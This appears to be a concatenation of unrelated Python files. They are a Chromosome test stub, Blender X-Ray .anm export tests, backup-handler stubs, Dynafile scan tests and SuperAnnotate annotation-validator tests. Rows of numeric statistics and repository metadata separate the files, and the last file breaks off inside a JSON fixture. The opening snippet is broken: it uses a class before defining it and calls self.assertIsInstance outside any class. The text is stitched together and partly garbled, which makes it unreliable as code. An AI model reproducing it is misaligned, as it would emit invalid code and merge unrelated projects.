test = Test()
class Test(Chromosome):
def fitness(self):
pass
def reset_fitness(self):
pass
def is_optimal(self):
pass
def random_instance(cls):
pass
def crossover(self, other):
pass
def mutate(self):
pass
def large_mutate(self):
pass
Test.fitness("self")
Test.reset_fitness("self")
Test.is_optimal("self")
Test.random_instance("cls")
Test.crossover("self", "other")
Test.mutate("self")
Test.large_mutate("self")
test = Test()
self.assertIsInstance(test, Test)
| 24.45977
| 48
| 0.441259
| 541
| 6,384
| 5.092421
| 0.05915
| 0.104174
| 0.107804
| 0.09147
| 0.874773
| 0.874773
| 0.874773
| 0.85735
| 0.85735
| 0.85735
| 0
| 0
| 0.469925
| 6,384
| 260
| 49
| 24.553846
| 0.814125
| 0.005952
| 0
| 0.935484
| 0
| 0
| 0.039943
| 0
| 0
| 0
| 0
| 0
| 0.048387
| 1
| 0.268817
| false
| 0.268817
| 0.010753
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
f7b1cecb08c0ddb5c25b481117391c4bac7b25cb
| 7,013
|
py
|
Python
|
tests/cases/test_anm_export.py
|
clayne/blender-xray
|
84d5d52049ec9e22c85ba8544995bd39c3a83e55
|
[
"BSD-2-Clause"
] | null | null | null |
tests/cases/test_anm_export.py
|
clayne/blender-xray
|
84d5d52049ec9e22c85ba8544995bd39c3a83e55
|
[
"BSD-2-Clause"
] | null | null | null |
tests/cases/test_anm_export.py
|
clayne/blender-xray
|
84d5d52049ec9e22c85ba8544995bd39c3a83e55
|
[
"BSD-2-Clause"
] | null | null | null |
import re
import bpy
from tests import utils
class TestAnmExport(utils.XRayTestCase):
def test_yxz(self):
# Arrange
obj = self._create_active_object()
act = bpy.data.actions.new('tact')
obj.animation_data_create().action = act
# Act
bpy.ops.xray_export.anm(filepath=self.outpath('Cube1.anm'), )
# Assert
self.assertOutputFiles({
'Cube1.anm'
})
def test_has_no_rot(self):
# Arrange
obj = self._create_active_object()
obj.rotation_mode = 'YXZ'
act = bpy.data.actions.new('tact')
for i in range(3):
fcu = act.fcurves.new('location', index=i)
fcu.keyframe_points.insert(1, 0)
obj.animation_data_create().action = act
# Act
bpy.ops.xray_export.anm(
filepath=self.outpath('test.anm'),
)
self.assertReportsContains('ERROR', re.compile('Action has keys not for all channels'))
def test_has_no_loc(self):
# Arrange
obj = self._create_active_object()
obj.rotation_mode = 'YXZ'
act = bpy.data.actions.new('tact')
for i in range(3):
fcu = act.fcurves.new('rotation_euler', index=i)
fcu.keyframe_points.insert(1, 0)
obj.animation_data_create().action = act
# Act
bpy.ops.xray_export.anm(
filepath=self.outpath('test.anm'),
)
self.assertReportsContains('ERROR', re.compile('Action has keys not for all channels'))
def test_has_no_loc_rot(self):
# Arrange
obj = self._create_active_object()
obj.rotation_mode = 'YXZ'
act = bpy.data.actions.new('tact')
obj.animation_data_create().action = act
# Act
bpy.ops.xray_export.anm(
filepath=self.outpath('test.anm'),
)
self.assertReportsContains('ERROR', re.compile('Action has keys not for all channels'))
def test_custom_refine(self):
# Arrange
obj = self._create_active_object()
obj.rotation_mode = 'YXZ'
act = bpy.data.actions.new('tact')
act.xray.autobake_custom_refine = True
obj.animation_data_create().action = act
for i in range(3):
fcu = act.fcurves.new('location', index=i)
fcu.keyframe_points.insert(1, 0)
fcu.keyframe_points.insert(10, 1)
fcu = act.fcurves.new('rotation_euler', index=i)
fcu.keyframe_points.insert(1, 0)
fcu.keyframe_points.insert(10, 1)
# Act
bpy.ops.xray_export.anm(
filepath=self.outpath('test.anm'),
)
def test_bake_on(self):
# Arrange
obj = self._create_active_object()
obj.rotation_mode = 'YXZ'
act = bpy.data.actions.new('tact')
act.xray.autobake_custom_refine = True
act.xray.autobake_on = True
obj.animation_data_create().action = act
for i in range(3):
fcu = act.fcurves.new('location', index=i)
fcu.keyframe_points.insert(1, 0)
fcu.keyframe_points.insert(10, 1)
fcu = act.fcurves.new('rotation_euler', index=i)
fcu.keyframe_points.insert(1, 0)
fcu.keyframe_points.insert(10, 1)
# Act
bpy.ops.xray_export.anm(
filepath=self.outpath('test.anm'),
)
def test_color_keys(self):
# Arrange
obj = self._create_active_object()
obj.rotation_mode = 'YXZ'
act = bpy.data.actions.new('tact')
obj.animation_data_create().action = act
for i in range(3):
fcu = act.fcurves.new('location', index=i)
fcu.keyframe_points.insert(1, 0)
fcu.keyframe_points.insert(10, 1)
fcu = act.fcurves.new('rotation_euler', index=i)
fcu.keyframe_points.insert(1, 0)
fcu.keyframe_points.insert(10, 1)
fcu = act.fcurves.new('color', index=i)
fcu.keyframe_points.insert(1, 0)
fcu.keyframe_points.insert(10, 1)
# Act
bpy.ops.xray_export.anm(
filepath=self.outpath('test.anm'),
)
def test_ok(self):
# Arrange
obj = self._create_active_object()
obj.rotation_mode = 'YXZ'
act = bpy.data.actions.new('tact')
for i in range(3):
fcu = act.fcurves.new('location', index=i)
fcu.keyframe_points.insert(1, 0)
fcu = act.fcurves.new('rotation_euler', index=i)
fcu.keyframe_points.insert(1, 0)
obj.animation_data_create().action = act
# Act
bpy.ops.xray_export.anm(
filepath=self.outpath('test.anm'),
)
# Assert
self.assertOutputFiles({
'test.anm'
})
def test_v3(self):
# Arrange
obj = self._create_active_object()
obj.rotation_mode = 'YXZ'
act = bpy.data.actions.new('tact')
for i in range(3):
fcu = act.fcurves.new('location', index=i)
fcu.keyframe_points.insert(1, 0)
fcu = act.fcurves.new('rotation_euler', index=i)
fcu.keyframe_points.insert(1, 0)
obj.animation_data_create().action = act
# Act
bpy.ops.xray_export.anm(
filepath=self.outpath('test_v3.anm'),
format_version='3'
)
# Assert
self.assertOutputFiles({
'test_v3.anm'
})
def test_v4(self):
# Arrange
obj = self._create_active_object()
obj.rotation_mode = 'YXZ'
act = bpy.data.actions.new('tact')
for i in range(3):
fcu = act.fcurves.new('location', index=i)
fcu.keyframe_points.insert(1, 0)
fcu = act.fcurves.new('rotation_euler', index=i)
fcu.keyframe_points.insert(1, 0)
obj.animation_data_create().action = act
# Act
bpy.ops.xray_export.anm(
filepath=self.outpath('test_v4.anm'),
format_version='4'
)
# Assert
self.assertOutputFiles({
'test_v4.anm'
})
def test_v5(self):
# Arrange
obj = self._create_active_object()
obj.rotation_mode = 'YXZ'
act = bpy.data.actions.new('tact')
for i in range(3):
fcu = act.fcurves.new('location', index=i)
fcu.keyframe_points.insert(1, 0)
fcu = act.fcurves.new('rotation_euler', index=i)
fcu.keyframe_points.insert(1, 0)
obj.animation_data_create().action = act
# Act
bpy.ops.xray_export.anm(
filepath=self.outpath('test_v5.anm'),
format_version='5'
)
# Assert
self.assertOutputFiles({
'test_v5.anm'
})
def _create_active_object(self):
obj = bpy.data.objects.new('tobj', None)
utils.link_object(obj)
utils.set_active_object(obj)
return obj
| 29.590717
| 95
| 0.563667
| 857
| 7,013
| 4.43874
| 0.098016
| 0.069401
| 0.107256
| 0.14511
| 0.86409
| 0.86409
| 0.86409
| 0.854627
| 0.854627
| 0.854627
| 0
| 0.016264
| 0.316127
| 7,013
| 236
| 96
| 29.716102
| 0.776897
| 0.02367
| 0
| 0.738095
| 0
| 0
| 0.078164
| 0
| 0
| 0
| 0
| 0
| 0.047619
| 1
| 0.071429
| false
| 0
| 0.017857
| 0
| 0.10119
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f7c6c10f2f5b80e140035ee3e4f3e9b75afc73e0
| 30
|
py
|
Python
|
tests/tes_okex_ws_spot_client.py
|
hhstore/py-crypto-exchange-apis
|
5164dc01de5691f10a521f037028032e3128e5e0
|
[
"MIT"
] | 4
|
2018-09-20T09:49:41.000Z
|
2020-04-08T23:27:12.000Z
|
tests/tes_okex_ws_spot_client.py
|
hhstore/py-crypto-exchange-apis
|
5164dc01de5691f10a521f037028032e3128e5e0
|
[
"MIT"
] | 1
|
2021-05-14T15:29:01.000Z
|
2021-05-14T15:29:01.000Z
|
tests/tes_okex_ws_spot_client.py
|
hhstore/py-crypto-exchange-apis
|
5164dc01de5691f10a521f037028032e3128e5e0
|
[
"MIT"
] | 2
|
2021-05-14T15:28:58.000Z
|
2021-05-17T06:11:21.000Z
|
from pprint import pprint
| 5
| 25
| 0.733333
| 4
| 30
| 5.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 30
| 5
| 26
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
f75c3dd62939d647ef1c79a9023e4238aa9dc3d5
| 157
|
py
|
Python
|
flask-microservice/api/util/backup_handlers.py
|
sashaobucina/coronatracker
|
236a1130977987eb90cf15973e4367d5f079dc7d
|
[
"MIT"
] | 9
|
2020-04-29T16:31:39.000Z
|
2021-12-19T01:18:21.000Z
|
flask-microservice/api/util/backup_handlers.py
|
sashaobucina/coronatracker
|
236a1130977987eb90cf15973e4367d5f079dc7d
|
[
"MIT"
] | 7
|
2020-04-29T16:43:17.000Z
|
2022-02-19T07:04:59.000Z
|
flask-microservice/api/util/backup_handlers.py
|
sashaobucina/coronatracker
|
236a1130977987eb90cf15973e4367d5f079dc7d
|
[
"MIT"
] | 2
|
2020-05-18T05:25:37.000Z
|
2020-08-07T09:02:33.000Z
|
def load_from_backup():
"""
"""
# TODO
pass
def save_to_backup():
"""
"""
# TODO
pass
if __name__ == "__main__":
pass
| 9.8125
| 26
| 0.471338
| 16
| 157
| 3.875
| 0.6875
| 0.322581
| 0.451613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.369427
| 157
| 16
| 27
| 9.8125
| 0.626263
| 0.057325
| 0
| 0.5
| 0
| 0
| 0.064516
| 0
| 0
| 0
| 0
| 0.125
| 0
| 1
| 0.333333
| true
| 0.5
| 0
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
f75e11209704b4c1ca00d10b546afdd97cf2b6e8
| 1,618
|
py
|
Python
|
tests/test_scan.py
|
eruvanos/dynafile
|
207425b073a963b01c677b697e74842b429c004a
|
[
"MIT"
] | null | null | null |
tests/test_scan.py
|
eruvanos/dynafile
|
207425b073a963b01c677b697e74842b429c004a
|
[
"MIT"
] | null | null | null |
tests/test_scan.py
|
eruvanos/dynafile
|
207425b073a963b01c677b697e74842b429c004a
|
[
"MIT"
] | null | null | null |
from _operator import itemgetter
from dynafile import Dynafile
def test_scan_all_items(tmp_path):
db = Dynafile(tmp_path / "db")
aa = {
"PK": "1",
"SK": "aa",
}
ab = {
"PK": "1",
"SK": "ab",
}
ac = {
"PK": "1",
"SK": "ac",
}
ba = {
"PK": "2",
"SK": "ba",
}
db.put_item(item=aa)
db.put_item(item=ab)
db.put_item(item=ac)
db.put_item(item=ba)
items = set(map(itemgetter("SK"), db.scan()))
assert items == {"aa", "ab", "ac", "ba"}
def test_scan_with_callable_filter(tmp_path):
db = Dynafile(tmp_path / "db")
aa = {
"PK": "1",
"SK": "aa",
}
ab = {
"PK": "1",
"SK": "ab",
}
ac = {
"PK": "1",
"SK": "ac",
}
ba = {
"PK": "2",
"SK": "ba",
}
db.put_item(item=aa)
db.put_item(item=ab)
db.put_item(item=ac)
db.put_item(item=ba)
items = set(map(itemgetter("SK"), db.scan(_filter=lambda i: i["SK"].startswith("a"))))
assert items == {"aa", "ab", "ac"}
def test_scan_with_string_filter(tmp_path):
db = Dynafile(tmp_path / "db")
aa = {
"PK": "1",
"SK": "aa",
}
ab = {
"PK": "1",
"SK": "ab",
}
ac = {
"PK": "1",
"SK": "ac",
}
ba = {
"PK": "2",
"SK": "ba",
}
db.put_item(item=aa)
db.put_item(item=ab)
db.put_item(item=ac)
db.put_item(item=ba)
items = set(map(itemgetter("SK"), db.scan(_filter="SK =~ /^a/")))
assert items == {"aa", "ab", "ac"}
| 17.212766
| 90
| 0.434487
| 213
| 1,618
| 3.150235
| 0.159624
| 0.089419
| 0.160954
| 0.232489
| 0.789866
| 0.764531
| 0.710879
| 0.710879
| 0.710879
| 0.710879
| 0
| 0.011374
| 0.34796
| 1,618
| 93
| 91
| 17.397849
| 0.624645
| 0
| 0
| 0.716216
| 0
| 0
| 0.079728
| 0
| 0
| 0
| 0
| 0
| 0.040541
| 1
| 0.040541
| false
| 0
| 0.027027
| 0
| 0.067568
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3ac9a9ddb455964e828dc6fcf1722aed5bbcca6
| 103,716
|
py
|
Python
|
tests/unit/test_validators.py
|
dshabin/superannotate-python-sdk
|
3f2d7c5eed1fd7bb2990fcb0041a36803b10a115
|
[
"MIT"
] | 26
|
2020-09-25T06:25:06.000Z
|
2022-01-30T16:44:07.000Z
|
tests/unit/test_validators.py
|
dshabin/superannotate-python-sdk
|
3f2d7c5eed1fd7bb2990fcb0041a36803b10a115
|
[
"MIT"
] | 12
|
2020-12-21T19:59:48.000Z
|
2022-01-21T10:32:07.000Z
|
tests/unit/test_validators.py
|
dshabin/superannotate-python-sdk
|
3f2d7c5eed1fd7bb2990fcb0041a36803b10a115
|
[
"MIT"
] | 11
|
2020-09-17T13:39:19.000Z
|
2022-03-02T18:12:29.000Z
|
import json
import os
from os.path import dirname
import tempfile
import src.superannotate as sa
from tests.utils.helpers import catch_prints
from src.superannotate.lib.core.entities.utils import TimedBaseModel
from src.superannotate.lib.core.entities.pixel import PixelAnnotationPart
from pydantic import ValidationError
from unittest import TestCase
VECTOR_ANNOTATION_JSON_WITH_BBOX = """
{
"metadata": {
"name": "example_image_1.jpg",
"width": 1024,
"height": 683,
"status": "Completed",
"pinned": false,
"isPredicted": null,
"projectId": null,
"annotatorEmail": null,
"qaEmail": null
},
"instances": [
{
"type": "bbox",
"classId": 72274,
"probability": 100,
"points": {
"x2": 465.23,
"y1": 341.5,
"y2": 357.09
},
"groupId": 0,
"pointLabels": {},
"locked": false,
"visible": false,
"attributes": [
{
"id": 117845,
"groupId": 28230,
"name": "2",
"groupName": "Num doors"
}
],
"trackingId": "aaa97f80c9e54a5f2dc2e920fc92e5033d9af45b",
"error": null,
"createdAt": null,
"createdBy": null,
"creationType": null,
"updatedAt": null,
"updatedBy": null,
"className": "Personal vehicle"
}
]
}
"""
class TestValidators(TestCase):
TEST_VECTOR_FOLDER_PATH = "data_set/sample_project_vector"
VECTOR_JSON = "example_image_1.jpg___objects.json"
@property
def vector_folder_path(self):
return os.path.join(dirname(dirname(__file__)), self.TEST_VECTOR_FOLDER_PATH)
def test_validate_annotations_should_note_raise_errors(self):
sa.validate_annotations("Vector", os.path.join(self.vector_folder_path, self.VECTOR_JSON))
def test_validate_annotation_with_wrong_bbox(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/vector.json", "w") as vector_json:
vector_json.write(VECTOR_ANNOTATION_JSON_WITH_BBOX)
with catch_prints() as out:
sa.validate_annotations("Vector", os.path.join(self.vector_folder_path, f"{tmpdir_name}/vector.json"))
self.assertIn("instances[0].points.x1fieldrequired", out.getvalue().strip().replace(" ", ""))
def test_validate_annotation_without_metadata(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/vector.json", "w") as vector_json:
vector_json.write(
json.dumps({"instances": []})
)
with catch_prints() as out:
sa.validate_annotations("Vector", os.path.join(self.vector_folder_path, f"{tmpdir_name}/vector.json"))
self.assertIn("metadatafieldrequired", out.getvalue().strip().replace(" ", ""))
def test_validate_annotation_invalid_date_time_format(self):
with self.assertRaisesRegexp(ValidationError, "does not match expected format YYYY-MM-DDTHH:MM:SS.fffZ"):
TimedBaseModel(createdAt="2021-11-02T15:11:50.065000Z")
def test_validate_annotation_valid_date_time_format(self):
self.assertEqual(TimedBaseModel(createdAt="2021-11-02T15:11:50.065Z").created_at, "2021-11-02T15:11:50.065Z")
def test_validate_annotation_invalid_color_format(self):
with self.assertRaisesRegexp(ValidationError, "1 validation error for PixelAnnotationPart"):
PixelAnnotationPart(color="fd435eraewf4rewf")
def test_validate_annotation_valid_color_format(self):
self.assertEqual(PixelAnnotationPart(color="#f1f2f3").color, "#f1f2f3")
class TestTypeHandling(TestCase):
ANNOTATION = """
{
"metadata": {
"name": "example_image_1.jpg",
"width": 1024,
"height": 683,
"status": "Completed",
"pinned": false,
"isPredicted": null,
"projectId": null,
"annotatorEmail": null,
"qaEmail": null
},
"instances": [
{
"type": "invalid_type",
"classId": 72274,
"probability": 100,
"points": {
"x2": 465.23,
"y1": 341.5,
"y2": 357.09
},
"groupId": 0,
"pointLabels": {},
"locked": false,
"visible": false,
"attributes": [
{
"id": 117845,
"groupId": 28230,
"name": "2",
"groupName": "Num doors"
}
],
"trackingId": "aaa97f80c9e54a5f2dc2e920fc92e5033d9af45b",
"error": null,
"createdAt": null,
"createdBy": null,
"creationType": null,
"updatedAt": null,
"updatedBy": null,
"className": "Personal vehicle"
}
]
}
"""
TEST_VECTOR_FOLDER_PATH = "data_set/sample_project_vector"
VECTOR_JSON = "example_image_1.jpg___objects.json"
@property
def vector_folder_path(self):
return os.path.join(dirname(dirname(__file__)), self.TEST_VECTOR_FOLDER_PATH)
def test_validate_document_annotation_without_classname(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_document_annotation_without_classname.json",
"w") as test_validate_document_annotation_without_classname:
test_validate_document_annotation_without_classname.write(
'''
{
"metadata": {
"name": "text_file_example_1",
"status": "NotStarted",
"url": "https://sa-public-files.s3.us-west-2.amazonaws.com/Text+project/text_file_example_1.txt",
"projectId": 167826,
"annotatorEmail": null,
"qaEmail": null,
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636620976450
}
},
"instances": [{
"start": 253,
"end": 593,
"classId": -1,
"createdAt": "2021-10-22T10:40:26.151Z",
"createdBy": {
"email": "some.email@gmail.com",
"role": "Admin"
},
"updatedAt": "2021-10-22T10:40:29.953Z",
"updatedBy": {
"email": "some.email@gmail.com",
"role": "Admin"
},
"attributes": [],
"creationType": "Manual"
}],
"tags": [],
"freeText": ""
}
'''
)
self.assertTrue(sa.validate_annotations("Document", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_document_annotation_without_classname.json")))
def test_validate_annotation_with_wrong_bbox(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/vector.json", "w") as vector_json:
vector_json.write(self.ANNOTATION)
with catch_prints() as out:
sa.validate_annotations("Vector", os.path.join(self.vector_folder_path, f"{tmpdir_name}/vector.json"))
self.assertEqual(
"instances[0].typeinvalidtype,validtypesarebbox,template,cuboid,polygon,point,polyline,ellipse,rbbox",
out.getvalue().strip().replace(" ", "")
)
def test_validate_document_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/doc.json", "w") as doc_json:
doc_json.write(
'''
{
"metadata": {
"name": "text_file_example_1",
"status": "NotStarted",
"url": "https://sa-public-files.s3.us-west-2.amazonaws.com/Text+project/text_file_example_1.txt",
"projectId": 167826,
"annotatorEmail": null,
"qaEmail": null,
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636620976450
}
},
"instances": [],
"tags": [],
"freeText": ""
}
'''
)
self.assertTrue(
sa.validate_annotations("Document", os.path.join(self.vector_folder_path, f"{tmpdir_name}/doc.json")))
def test_validate_pixel_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/pixel.json", "w") as pix_json:
pix_json.write(
'''
{
"metadata": {
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636627539398
},
"width": 1024,
"height": 683,
"name": "example_image_1.jpg",
"projectId": 164324,
"isPredicted": false,
"isSegmented": false,
"status": "NotStarted",
"pinned": false,
"annotatorEmail": null,
"qaEmail": null
},
"comments": [],
"tags": [],
"instances": []
}
'''
)
self.assertTrue(
sa.validate_annotations("Pixel", os.path.join(self.vector_folder_path, f"{tmpdir_name}/pixel.json")))
def test_validate_video_export_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/video_export.json", "w") as video_export:
video_export.write(
'''
{
"metadata": {
"name": "video.mp4",
"width": 848,
"height": 476,
"status": "NotStarted",
"url": "https://file-examples-com.github.io/uploads/2017/04/file_example_MP4_480_1_5MG.mp4",
"duration": 2817000,
"projectId": 164334,
"error": null,
"annotatorEmail": null,
"qaEmail": null,
"lastAction": {
"timestamp": 1636384061135,
"email": "some.email@gmail.com"
}
},
"instances": [],
"tags": []
}
'''
)
self.assertTrue(sa.validate_annotations("Video", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/video_export.json")))
def test_validate_vector_empty_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/vector_empty.json", "w") as vector_empty:
vector_empty.write(
'''
{
"metadata": {
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636627956948
},
"width": 1024,
"height": 683,
"name": "example_image_1.jpg",
"projectId": 162462,
"isPredicted": false,
"status": "NotStarted",
"pinned": false,
"annotatorEmail": null,
"qaEmail": null
},
"comments": [],
"tags": [],
"instances": []
}
'''
)
self.assertTrue(sa.validate_annotations("Vector", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/vector_empty.json")))
def test_validate_error_message_format(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_error_message_format.json",
"w") as test_validate_error_message_format:
test_validate_error_message_format.write(
'''
{
"metadata": {}
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Vector", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_error_message_format.json"))
self.assertIn("metadata.namefieldrequired", out.getvalue().strip().replace(" ", ""))
def test_validate_document_annotation_wrong_class_id(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_document_annotation_wrong_class_id.json",
"w") as test_validate_document_annotation_wrong_class_id:
test_validate_document_annotation_wrong_class_id.write(
'''
{
"metadata": {
"name": "text_file_example_1",
"status": "NotStarted",
"url": "https://sa-public-files.s3.us-west-2.amazonaws.com/Text+project/text_file_example_1.txt",
"projectId": 167826,
"annotatorEmail": null,
"qaEmail": null,
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636620976450
}
},
"instances": [{
"start": 253,
"end": 593,
"classId": "string",
"createdAt": "2021-10-22T10:40:26.151Z",
"createdBy": {
"email": "some.email@gmail.com",
"role": "Admin"
},
"updatedAt": "2021-10-22T10:40:29.953Z",
"updatedBy": {
"email": "some.email@gmail.com",
"role": "Admin"
},
"attributes": [],
"creationType": "Manual",
"className": "vid"
}],
"tags": [],
"freeText": ""
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Document", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_document_annotation_wrong_class_id.json"))
self.assertIn("instances[0].classIdintegertypeexpected", out.getvalue().strip().replace(" ", ""))
def test_validate_document_annotation_with_null_created_at(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_document_annotation_with_null_created_at.json",
"w") as test_validate_document_annotation_with_null_created_at:
test_validate_document_annotation_with_null_created_at.write(
'''
{
"metadata": {
"name": "text_file_example_1",
"status": "NotStarted",
"url": "https://sa-public-files.s3.us-west-2.amazonaws.com/Text+project/text_file_example_1.txt",
"projectId": 167826,
"annotatorEmail": null,
"qaEmail": null,
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636620976450
}
},
"instances": [{
"start": 253,
"end": 593,
"classId": 1,
"createdAt": null,
"createdBy": {
"email": "some.email@gmail.com",
"role": "Admin"
},
"updatedAt": null,
"updatedBy": {
"email": "some.email@gmail.com",
"role": "Admin"
},
"attributes": [],
"creationType": "Manual",
"className": "vid"
}],
"tags": [],
"freeText": ""
}
'''
)
self.assertTrue(sa.validate_annotations("Document", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_document_annotation_with_null_created_at.json")))
def test_validate_vector_instace_type_and_attr_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_vector_instace_type_and_attr_annotation.json",
"w") as test_validate_vector_instace_type_and_attr_annotation:
test_validate_vector_instace_type_and_attr_annotation.write(
'''
{
"metadata": {
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636958573242
},
"width": 1234,
"height": 1540,
"name": "t.png",
"projectId": 164988,
"isPredicted": false,
"status": "Completed",
"pinned": false,
"annotatorEmail": null,
"qaEmail": null
},
"comments": [],
"tags": [],
"instances": [
{
"classId": 880080,
"probability": 100,
"points": {
"x1": 148.99,
"x2": 1005.27,
"y1": 301.96,
"y2": 1132.36
},
"groupId": 0,
"pointLabels": {},
"locked": false,
"visible": true,
"attributes": [],
"trackingId": null,
"error": null,
"createdAt": "2021-11-15T06:43:09.812Z",
"createdBy": {
"email": "shab.prog@gmail.com",
"role": "Admin"
},
"creationType": "Manual",
"updatedAt": "2021-11-15T06:43:13.831Z",
"updatedBy": {
"email": "shab.prog@gmail.com",
"role": "Admin"
},
"className": "kj"
}
]
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Vector", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_vector_instace_type_and_attr_annotation.json"))
self.assertIn("instances[0].typefieldrequired", out.getvalue().strip().replace(" ", ""))
def test_validate_vector_invalid_instace_type_and_attr_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_vector_invalid_instace_type_and_attr_annotation.json",
"w") as test_validate_vector_invalid_instace_type_and_attr_annotation:
test_validate_vector_invalid_instace_type_and_attr_annotation.write(
'''
{
"metadata": {
"lastAction": {
"email": "some.email@gmail.com",
"timestamp": 1636958573242
},
"width": 1234,
"height": 1540,
"name": "t.png",
"projectId": 164988,
"isPredicted": false,
"status": "Completed",
"pinned": false,
"annotatorEmail": null,
"qaEmail": null
},
"comments": [],
"tags": [],
"instances": [
{
"type": "bad_type",
"classId": 880080,
"probability": 100,
"points": {
"x1": 148.99,
"x2": 1005.27,
"y1": 301.96,
"y2": 1132.36
},
"groupId": 0,
"pointLabels": {},
"locked": false,
"visible": true,
"attributes": [],
"trackingId": null,
"error": null,
"createdAt": "2021-11-15T06:43:09.812Z",
"createdBy": {
"email": "shab.prog@gmail.com",
"role": "Admin"
},
"creationType": "Manual",
"updatedAt": "2021-11-15T06:43:13.831Z",
"updatedBy": {
"email": "shab.prog@gmail.com",
"role": "Admin"
},
"className": "kj"
}
]
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Vector", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_vector_invalid_instace_type_and_attr_annotation.json"))
self.assertIn(
"instances[0].typeinvalidtype,validtypesarebbox,template,cuboid,polygon,point,polyline,ellipse,rbbox",
out.getvalue().strip().replace(" ", ""))
def test_validate_video_invalid_instace_type_and_attr_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_video_invalid_instace_type_and_attr_annotation.json",
"w") as test_validate_video_invalid_instace_type_and_attr_annotation:
test_validate_video_invalid_instace_type_and_attr_annotation.write(
'''
{
"metadata": {
"name": "video.mp4",
"width": 480,
"height": 270,
"status": "NotStarted",
"url": "https://file-examples-com.github.io/uploads/2017/04/file_example_MP4_480_1_5MG.mp4",
"duration": 30526667,
"projectId": 152038,
"error": null,
"annotatorEmail": null,
"qaEmail": null
},
"instances": [
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"pointLabels": {
"3": "point label bro"
},
"start": 0,
"end": 30526667
},
"parameters": [
{
"start": 0,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 223.32,
"y1": 78.45,
"x2": 312.31,
"y2": 176.66
},
"timestamp": 0,
"attributes": []
},
{
"points": {
"x1": 182.08,
"y1": 33.18,
"x2": 283.45,
"y2": 131.39
},
"timestamp": 17271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.32,
"y1": 36.33,
"x2": 284.01,
"y2": 134.54
},
"timestamp": 18271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 45.09,
